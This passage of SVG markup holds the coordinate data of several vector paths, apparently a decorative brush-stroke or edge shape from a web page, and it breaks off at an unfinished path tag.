0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n <path d=\"M1816.5,60c4.4.2,2.5-.2,6.9-.1l-.3-.3C1819.3,59.6,1819.2,59.9,1816.5,60Z\"></path>\n <path d=\"M1840.9,48.4C1849.2,48,1837,46.9,1840.9,48.4Z\"></path>\n <path d=\"M1814.7,45.4c-.9.6,2.7,1.4,6.9,1.6C1817.5,46.5,1819.8,45.7,1814.7,45.4Z\"></path>\n <path d=\"M1737.3,44.2c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C1733.3,43.7,1739.7,43.9,1737.3,44.2Z\"></path>\n <path d=\"M1750.7,43.6c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C1744.4,43.5,1753.1,44.1,1750.7,43.6Z\"></path>\n <path d=\"M1780.6,44.5c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C1782.1,44,1777,44.2,1780.6,44.5Z\"></path>\n <path d=\"M1707,96.5c-4.4-.2-2.5.2-6.9.1-1.5-.4,1.7-.4.7-.7-.6-.1-6-.6-7.2-.3,4.8.3.4.7.9,1a32.42,32.42,0,0,1,4.4.3C1699,96.5,1709.4,97.3,1707,96.5Z\"></path>\n <path d=\"M686.9,114.8c-2.8.2.1.2.4.4C688.4,116.2,691.2,115,686.9,114.8Z\"></path>\n <path d=\"M528.3,98.8c-3.3-.1-5.4-.1-7,0,.3.1,0,.3,1.7.4C522,98.7,530,99.2,528.3,98.8Z\"></path>\n <path 